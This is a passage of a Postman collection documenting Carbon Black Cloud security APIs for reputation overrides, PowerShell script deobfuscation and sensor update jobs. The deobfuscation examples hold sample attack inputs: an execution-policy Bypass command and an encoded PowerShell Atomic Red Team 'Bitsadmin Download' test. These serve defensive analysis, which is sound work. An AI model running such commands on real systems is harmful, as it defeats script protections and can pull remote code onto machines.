Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"b5a987e2-64a5-4e4c-92e2-09a88d25aa1e","id":"b5a987e2-64a5-4e4c-92e2-09a88d25aa1e","name":"Reputation Override API 🗝","type":"folder"}},"urlObject":{"path":["appservices","v6","orgs","{{cb_org_key}}","reputations","overrides","_export"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[],"_postman_id":"99e7af9f-367f-4c18-94af-3e3454751b23"},{"name":"Bulk Delete Reputation Overrides","id":"e5344dca-bae8-446f-975c-e4ce5a8433d1","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"DELETE","header":[],"body":{"mode":"raw","raw":"[\n  \"<string>\"\n]","options":{"raw":{"language":"json"}}},"url":"{{cb_url}}/appservices/v6/orgs/{{cb_org_key}}/reputations/overrides/_delete","description":"<p>Bulk delete reputation overrides by id</p>\n<h3 id=\"rbac-permissions-required\">RBAC Permissions Required</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>org.reputations</td>\n<td>DELETE</td>\n</tr>\n</tbody>\n</table>\n</div><p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/platform/latest/reputation-override-api/#bulk-delete-reputation-overrides\">See Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"b5a987e2-64a5-4e4c-92e2-09a88d25aa1e","id":"b5a987e2-64a5-4e4c-92e2-09a88d25aa1e","name":"Reputation Override API 🗝","type":"folder"}},"urlObject":{"path":["appservices","v6","orgs","{{cb_org_key}}","reputations","overrides","_delete"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[],"_postman_id":"e5344dca-bae8-446f-975c-e4ce5a8433d1"}],"id":"b5a987e2-64a5-4e4c-92e2-09a88d25aa1e","description":"<h2 id=\"overview\">Overview</h2>\n<p>The Reputation Override API provides an organization with the ability to create a list of approved or banned applications using a SHA-256 hash, a certificate signer, or a path to a known IT tool application. The overridden reputation allows for Endpoint Standard to trigger deny or terminate actions based on policy configurations of known banned application or ignore applications that are approved. This provides ease of mind for an organization knowing that their infrastructure is secured against known bad actors and that their known good applications will not be interrupted by Carbon Black Cloud.</p>\n<h3 id=\"use-cases\">Use Cases</h3>\n<ul>\n<li>Override the reputation of an application by adding a SHA-256 hash, a certificate signer or a path to a known IT tool application or directory of IT tools to an Approved or Banned list</li>\n<li>Search or export existing reputation overrides that have already been configured</li>\n<li>Delete reputation overrides that are no longer relevant to your security posture</li>\n</ul>\n<h3 id=\"requirements\">Requirements</h3>\n<ul>\n<li>Carbon Black Cloud Endpoint Standard</li>\n<li>All API calls require an API key with appropriate permissions see Authentication</li>\n</ul>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":false},"event":[{"listen":"prerequest","script":{"type":"text/javascript","exec":[""],"id":"39cf97fc-0003-468b-88aa-c562ba9301f1"}},{"listen":"test","script":{"type":"text/javascript","exec":[""],"id":"7dacad4a-c6af-4be0-9c9a-663ad22a6541"}}],"_postman_id":"b5a987e2-64a5-4e4c-92e2-09a88d25aa1e"},{"name":"Script Deobfuscation API","item":[{"name":"De-obfuscate script","id":"883de524-72d5-42db-a800-18c6d47bf780","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"POST","header":[],"body":{"mode":"raw","raw":"{\n    \"input\": \"<string>\"\n}","options":{"raw":{"language":"json"}}},"url":"{{cb_url}}/tau/v2/orgs/{{cb_org_key}}/reveal","description":"<p>Allows users to de-obfuscate obfuscated scripts</p>\n<h3 id=\"rbac-permissions-required\">RBAC Permissions Required</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>script.deobfuscation  <br />(previously tau.reveal)</td>\n<td>EXECUTE</td>\n</tr>\n</tbody>\n</table>\n</div><p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/platform/latest/script-deobfuscation-api/\">API Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["tau","v2","orgs","{{cb_org_key}}","reveal"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[{"id":"54d93974-319c-44f3-a008-385140fb148c","name":"De-obfuscate script - example","originalRequest":{"method":"POST","header":[],"body":{"mode":"raw","raw":"{\n    \"input\": \"\\\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\" \\\"-Command\\\" \\\"if((Get-ExecutionPolicy ) -ne 'AllSigned') { Set-ExecutionPolicy -Scope Process Bypass }; & 'C:\\\\ddd\\\\amsi_Samples\\\\filebacked2.ps1'\\\"\"\n}","options":{"raw":{"language":"json"}}},"url":"{{cb_url}}/tau/v2/orgs/{{cb_org_key}}/reveal"},"_postman_previewlanguage":"json","header":[{"key":"Content-Type","value":"application/json","description":""}],"cookie":[],"responseTime":null,"body":"{\n    \"deobfuscated_code\": \"if ((Get-ExecutionPolicy) -ne 'AllSigned') {\\n    Set-ExecutionPolicy -Scope Process Bypass\\n} \\n\\n\\n& 'C:\\\\ddd\\\\amsi_Samples\\\\filebacked2.ps1'\\n\",\n    \"identities\": [\n        [\n            \"&\",\n            \"Bypass\",\n            \"Get-ExecutionPolicy\",\n            \"Set-ExecutionPolicy\"\n        ]\n    ],\n    \"obfuscation_level\": 0.19367016978775448,\n    \"original_code\": \"if ((Get-ExecutionPolicy) -ne 'AllSigned') {\\n    Set-ExecutionPolicy -Scope Process Bypass\\n} \\n\\n\\n& 'C:\\\\ddd\\\\amsi_Samples\\\\filebacked2.ps1'\\n\",\n    \"strings\": [\n        [\n            \"AllSigned\",\n            \"C:\\\\ddd\\\\amsi_Samples\\\\filebacked2.ps1\"\n        ]\n    ]\n}"},{"id":"dae1c753-9565-4269-bc9e-4880e728b430","name":"De-obfuscate Encoded Script","originalRequest":{"method":"POST","header":[],"body":{"mode":"raw","raw":"{\n    \"input\": \"\\\"powershell.exe\\\" -noninteractive -encodedcommand WwBDAG8AbgBzAG8AbABlAF0AOgA6AEkAbgBwAHUAdABFAG4AYwBvAGQAaQBuAGcAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFQAZQB4AHQALgBVAFQARgA4AEUAbgBjAG8AZABpAG4AZwAgACQAZgBhAGwAcwBlADsAIABJAG4AdgBvAGsAZQAtAEEAdABvAG0AaQBjAFQAZQBzAHQAIABUADEAMQA5ADcAIAAtAFQAZQBzAHQATgBhAG0AZQAgACIAQgBpAHQAcwBhAGQAbQBpAG4AIABEAG8AdwBuAGwAbwBhAGQAIAAoAGMAbQBkACkAIgAgAC0AUABhAHQAaABUAG8AQQB0AG8AbQBpAGMAcwBGAG8AbABkAGUAcgAgAEMAOgBcAEEAdABvAG0AaQBjAFIAZQBkAFQAZQBhAG0AXABDAHkAYgBvAHIAZwBcAGEAdABvAG0AaQBjAHMAIAAgAC0ASQBuAHAAdQB0AEEAcgBnAHMAIABAAHsAIgByAGUAbQBvAHQAZQBfAGYAaQBsAGUAIgAgAD0AIAAiAFMAdQBzAHAAaQBjAGkAbwB1AHMAVABMAEQAIgB9AA==\"\n}","options":{"raw":{"language":"json"}}},"url":"{{cb_url}}/tau/v2/orgs/{{cb_org_key}}/reveal"},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Wed, 04 Oct 2023 21:35:03 GMT"},{"key":"Content-Type","value":"application/json"},{"key":"Content-Length","value":"290"},{"key":"Connection","value":"keep-alive"},{"key":"Content-Encoding","value":"br"},{"key":"Vary","value":"Accept-Encoding"}],"cookie":[],"responseTime":null,"body":"{\n    \"original_code\": \"[Console]::InputEncoding = New-Object Text.UTF8Encoding $false\\n\\n\\nInvoke-AtomicTest T1197 -TestName \\\"Bitsadmin Download (cmd)\\\" -PathToAtomicsFolder C:\\\\AtomicRedTeam\\\\Cyborg\\\\atomics -InputArgs @{remote_file = \\\"SuspiciousTLD\\\",\\n}\\n\",\n    \"deobfuscated_code\": \"[Console]::InputEncoding = New-Object Text.UTF8Encoding $false\\n\\n\\nInvoke-AtomicTest T1197 -TestName \\\"Bitsadmin Download (cmd)\\\" -PathToAtomicsFolder C:\\\\AtomicRedTeam\\\\Cyborg\\\\atomics -InputArgs @{remote_file = \\\"SuspiciousTLD\\\",\\n}\\n\",\n    \"identities\": [\n        \"InputEncoding\",\n        \"Invoke-AtomicTest\",\n        \"New-Object\",\n        \"T1197\",\n        \"Text.UTF8Encoding\"\n    ],\n    \"strings\": [],\n    \"obfuscation_level\": 0.029678002879441317\n}"}],"_postman_id":"883de524-72d5-42db-a800-18c6d47bf780"}],"id":"b3e9bc5d-f840-48d4-b06c-8bb2214e375c","description":"<p>Allows users to deobfuscate obfuscated PowerShell scripts. Deobfuscation increases an analyst’s efficiency when analyzing a malicious scripts.</p>\n<p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/platform/latest/script-deobfuscation-api/\">See Documentation</a></p>\n","_postman_id":"b3e9bc5d-f840-48d4-b06c-8bb2214e375c","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}}},{"name":"Sensor Update Services API","item":[{"name":"Deprecated","item":[{"name":"Create a Sensor Update Job","id":"b3af557c-c410-4a31-8866-a141fcc0f3b6","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"POST","header":[],"body":{"mode":"raw","raw":"{\n  \"action_type\": \"UPDATE_SENSOR_VERSION\",\n  \"device_id\": [\n    0\n  ],\n  \"options\": {\n    \"sensor_version\": {\n      \"WINDOWS\": \"3.4.0.1\",\n      \"MAC\": \"2.1.1.1\"\n    }\n  },\n  \"search_definition\": {\n    \"criteria\": {\n      \"ad_group_id\": [\n        0\n      ],\n      \"id\": [\n        0\n      ],\n      \"last_contact_time\": {\n        \"range\": \"string\"\n      },\n      \"policy_id\": [\n        0\n      ],\n      \"status\": [\n        \"string\"\n      ],\n      \"target_priority\": [\n        \"string\"\n      ]\n    },\n    \"query\": \"string\",\n    \"rows\": 0,\n    \"sort\": [\n      {\n        \"field\": \"string\",\n        \"order\": \"ASC\"\n      }\n    ],\n    \"start\": 0\n  }\n}","options":{"raw":{"language":"json"}}},"url":"{{cb_url}}/sus/v2/orgs/{{cb_org_key}}/jobs?job_type={{cb_job_type}}","description":"<p>Create a job that will update all sensors that match either the search_definition or a list of device_ids. Only one of these criteria may be used.</p>\n<h3 id=\"rbac-permissions-required\">RBAC PERMISSIONS REQUIRED</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>org.kits</td>\n<td>EXECUTE</td>\n</tr>\n</tbody>\n</table>\n</div><p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/platform/latest/sensor-update-services-api/#create-a-sensor-update-job\">See Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["sus","v2","orgs","{{cb_org_key}}","jobs"],"host":["{{cb_url}}"],"query":[{"key":"job_type","value":"{{cb_job_type}}"}],"variable":[]}},"response":[],"_postman_id":"b3af557c-c410-4a31-8866-a141fcc0f3b6"},{"name":"Get the details of a job","id":"b4beae6a-4d48-4693-89bc-83300936823f","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"GET","header":[],"body":{"mode":"raw","raw":"","options":{"raw":{"language":"json"}}},"url":"{{cb_url}}/sus/v2/orgs/{{cb_org_key}}/jobs/{{cb_job_id}}","description":"<p>Get the details of a sensor update service job</p>\n<h3 id=\"rbac-permissions-required\">RBAC PERMISSIONS REQUIRED</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>device</td>\n<td>READ</td>\n</tr>\n</tbody>\n</table>\n</div><p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/platform/latest/sensor-update-services-api/#get-the-details-of-a-job\">See Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["sus","v2","orgs","{{cb_org_key}}","jobs","{{cb_job_id}}"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[],"_postman_id":"b4beae6a-4d48-4693-89bc-83300936823f"},{"name":"Get all jobs","id":"2d503cfd-3f5e-45b5-80d3-22c72933e7e2","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"GET","header":[],"body":{"mode":"raw","raw":"","options":{"raw":{"language":"json"}}},"url":"{{cb_url}}/sus/v2/orgs/{{cb_org_key}}/jobs?job_type={{cb_job_type}}","description":"<p>Get a list of all the sensor update service jobs for a specified job type in the provided organization</p>\n<h3 id=\"rbac-permissions-required\">RBAC PERMISSIONS REQUIRED</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>device</td>\n<td>READ</td>\n</tr>\n</tbody>\n</table>\n</div><p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/platform/latest/sensor-update-services-api/#get-all-jobs\">See Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["sus","v2","orgs","{{cb_org_key}}","jobs"],"host":["{{cb_url}}"],"query":[{"description":{"content":"<p>The type of sensor update job.  Default: ENDPOINT\nOptions: ENDPOINT</p>\n","type":"text/plain"},"key":"job_type","value":"{{cb_job_type}}"}],"variable":[]}},"response":[],"_postman_id":"2d503cfd-3f5e-45b5-80d3-22c72933e7e2"},{"name":"Get a list of all the Sensors in the given Job","id":"80e1e41e-b329-4e94-949e-28713713a0d9","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"GET","header":[],"body":{"mode":"raw","raw":"","options":{"raw":{"language":"json"}}},"url":"{{cb_url}}/sus/v2/orgs/{{cb_org_key}}/jobs?job_type={{cb_job_type}}","description":"<p>Get a list of all the sensor update service jobs for a specified job type in the provided organization</p>\n<h3 id=\"rbac-permissions-required\">RBAC PERMISSIONS REQUIRED</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>device</td>\n<td>READ</td>\n</tr>\n</tbody>\n</table>\n</div><p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/platform/latest/sensor-update-services-api/#get-all-jobs\">See Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["sus","v2","orgs","{{cb_org_key}}","jobs"],"host":["{{cb_url}}"],"query":[{"description":{"content":"<p>The type of sensor update job.  Default: ENDPOINT\nOptions: ENDPOINT</p>\n","type":"text/plain"},"key":"job_type","value":"{{cb_job_type}}"}],"variable":[]}},"response":[],"_postman_id":"80e1e41e-b329-4e94-949e-28713713a0d9"},{"name":"Cancel an in progress Job","id":"b98a1ba3-3728-47e6-9f19-03ea2d16129b","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"POST","header":[],"body":{"mode":"raw","raw":" {\n   \"status\": \"CANCELLED\"\n }","options":{"raw":{"language":"json"}}},"url":"{{cb_url}}/sus/v2/orgs/{{cb_org_key}}/jobs/{{cb_job_id}}/status","description":"<p>Cancels a sensor update service job that is in progress</p>\n<h3 id=\"rbac-permissions-required\">RBAC PERMISSIONS REQUIRED</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>org.kits</td>\n<td>EXECUTE</td>\n</tr>\n</tbody>\n</table>\n</div><p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/platform/latest/sensor-update-services-api/#create-a-sensor-update-job\">See Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["sus","v2","orgs","{{cb_org_key}}","jobs","{{cb_job_id}}","status"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[],"_postman_id":"b98a1ba3-3728-47e6-9f19-03ea2d16129b"}],"id":"5ac75f46-f809-49f1-911f-cb7336912e68","description":"<p>Previous Sensor Update Service API versions which are no longer supported</p>\n","_postman_id":"5ac75f46-f809-49f1-911f-cb7336912e68","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}}},{"name":"Create Sensor Update Job","id":"2d79090c-be1d-4e51-b9a6-e8b675f733cd","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"POST","header":[],"body":{"mode":"raw","raw":"{\n  \"job_type\": \"<string>\",\n  \"name\": \"<string>\",\n  \"options\": {\n    \"sensor_version\": {\n      \"WINDOWS\": \"<string>\",\n      \"MAC\": \"<string>\"\n    }\n  },\n  \"search_definition\": {\n    \"criteria\": {\n        \"ad_group_id\": [ <long>, <long> ],\n        \"auto_scaling_group_name\": [ \"<string>\", \"<string>\" ],\n        \"base_device\": <boolean>,\n        \"cloud_provider_account_id\": [ \"<string>\", \"<string>\" ],\n        \"cloud_provider_resource_id\": [ \"<string>\", \"<string>\" ],\n        \"cloud_provider_tags\": [ \"<string>\", \"<string>\" ],\n        \"deployment_type\": [ \"<string>\", \"<string>\" ],\n        \"golden_device_id\": [ \"<string>\", \"<string>\" ],\n        \"golden_device_status\": [ \"<string>\", \"<string>\" ],\n        \"host_based_firewall_status\": [ \"<string>\", \"<string>\" ],\n        \"host_based_firewall_reason\": \"<string>\",\n        \"id\": [ <long>, <long> ],\n        \"infrastructure_provider\": [ \"<string>\", \"<string>\" ],\n        \"last_contact_time\": {\n            \"end\": \"<dateTime>\",\n            \"range\": \"<string>\",\n            \"start\": \"<dateTime>\"\n        },\n        \"os\": [ \"<string>\", \"<string>\" ],\n        \"os_version\": [ \"<string>\", \"<string>\"],\n        \"policy_id\": [ <long>, <long> ],\n        \"sensor_version\": [ \"<string>\", \"<string>\" ],\n        \"signature_status\": [ \"<string>\", \"<string>\" ],\n        \"status\": [ \"<string>\", \"<string>\" ],\n        \"sub_deployment_type\": [ \"<string>\", \"<string>\" ],\n        \"target_priority\": [ \"<string>\", \"<string>\" ],\n        \"vcenter_uuid\": [ \"<string>\", \"<string>\" ],\n        \"virtual_private_cloud_id\": [ \"<string>\", \"<string>\" ],\n        \"virtualization_provider\": [ \"<string>\", \"<string>\" ],\n        \"vm_uuid\": [ \"<string>\", \"<string>\" ],\n        \"vcenter_host_url\": [ \"<string>\", \"<string>\" ]\n    },\n    \"query\": \"<string>\"\n  }\n}","options":{"raw":{"language":"json"}}},"url":"{{cb_url}}/sensor_update_service/v3/orgs/{{cb_org_key}}/jobs","description":"<p>Create a job that will update all sensors that match either the search_definition or a list of device_ids. Only one of these criteria may be used.</p>\n<h3 id=\"rbac-permissions-required\">RBAC Permissions Required</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>org.kits</td>\n<td>EXECUTE</td>\n</tr>\n</tbody>\n</table>\n</div><p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/platform/latest/sensor-update-services-api/#create-sensor-update-job\">See Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["sensor_update_service","v3","orgs","{{cb_org_key}}","jobs"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[],"_postman_id":"2d79090c-be1d-4e51-b9a6-e8b675f733cd"},{"name":"Search Sensor Update Jobs","id":"26e17530-866c-4bbe-b206-5cec92c3cdc9","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"POST","header":[],"body":{"mode":"raw","raw":"{\n  \"criteria\": {\n    \"job_type\": \"<string>\"\n  },\n  \"query\": \"<string>\",\n  \"rows\": 10,\n  \"start\": 0\n}","options":{"raw":{"language":"json"}}},"url":"{{cb_url}}/sensor_update_service/v3/orgs/{{cb_org_key}}/jobs/_search","description":"<p>Search through sensor update jobs by job type and job name</p>\n<h3 id=\"rbac-permissions-required\">RBAC Permissions Required</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>device</td>\n<td>READ</td>\n</tr>\n</tbody>\n</table>\n</div><p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/platform/latest/sensor-update-services-api/#search-sensor-update-jobs\">See Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["sensor_update_service","v3","orgs","{{cb_org_key}}","jobs","_search"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[],"_postman_id":"26e17530-866c-4bbe-b206-5cec92c3cdc9"},{"name":"Get Sensor Update Job","id":"18887355-2e78-41a1-889f-2762a764cccf","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"GET","header":[],"url":"{{cb_url}}/sensor_update_service/v3/orgs/{{cb_org_key}}/jobs/{{cb_job_id}}","description":"<p>Get the latest details of a sensor update service job</p>\n<h3 id=\"rbac-permissions-required\">RBAC Permissions Required</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>device</td>\n<td>READ</td>\n</tr>\n</tbody>\n</table>\n</div><p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/platform/latest/sensor-update-services-api/#get-sensor-update-job\">See Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["sensor_update_service","v3","orgs","{{cb_org_key}}","jobs","{{cb_job_id}}"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[],"_postman_id":"18887355-2e78-41a1-889f-2762a764cccf"},{"name":"Update Sensor Update Job Name","id":"23f12de3-0291-4027-869b-14c203ab054b","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"PUT","header":[],"body":{"mode":"raw","raw":"{\n  \"name\": \"<string>\"\n}\n","options":{"raw":{"language":"json"}}},"url":"{{cb_url}}/sensor_update_service/v3/orgs/{{cb_org_key}}/jobs/{{cb_job_id}}","description":"<p>Modify the name of the sensor update job.</p>\n<h3 id=\"rbac-permissions-required\">RBAC Permissions Required</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>org.kits</td>\n<td>EXECUTE</td>\n</tr>\n</tbody>\n</table>\n</div><p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/platform/latest/sensor-update-services-api/#update-sensor-update-job-name\">See Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["sensor_update_service","v3","orgs","{{cb_org_key}}","jobs","{{cb_job_id}}"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[],"_postman_id":"23f12de3-0291-4027-869b-14c203ab054b"},{"name":"Stop Sensor Update Job","id":"566473b8-4bff-45b2-8335-4ccf971c7093","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"DELETE","header":[],"url":"{{cb_url}}/sensor_update_service/v3/orgs/{{cb_org_key}}/jobs/{{cb_job_id}}","description":"<p>Cancels a sensor update job that is in progress. Any sensors which are in progress updating will attempt to complete upgrade while all non started sensors will be canceled.</p>\n<h3 id=\"rbac-permissions-required\">RBAC Permissions Required</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>org.kits</td>\n<td>EXECUTE</td>\n</tr>\n</tbody>\n</table>\n</div><p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/platform/latest/sensor-update-services-api/#stop-sensor-update-job\">See Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["sensor_update_service","v3","orgs","{{cb_org_key}}","jobs","{{cb_job_id}}"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[],"_postman_id":"566473b8-4bff-45b2-8335-4ccf971c7093"},{"name":"Search Sensors in Sensor Update Job","id":"545d34b1-c4bf-4957-b4e2-fab4501fb654","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"POST","header":[],"body":{"mode":"raw","raw":"{\n  \"criteria\": {\n    \"sensor_kit_type\": [\"<string>\", \"<string>\"],\n    \"status\": [\"<string>\", \"<string>\"],\n    \"version\": [\"<string>\", \"<string>\"]\n  },\n  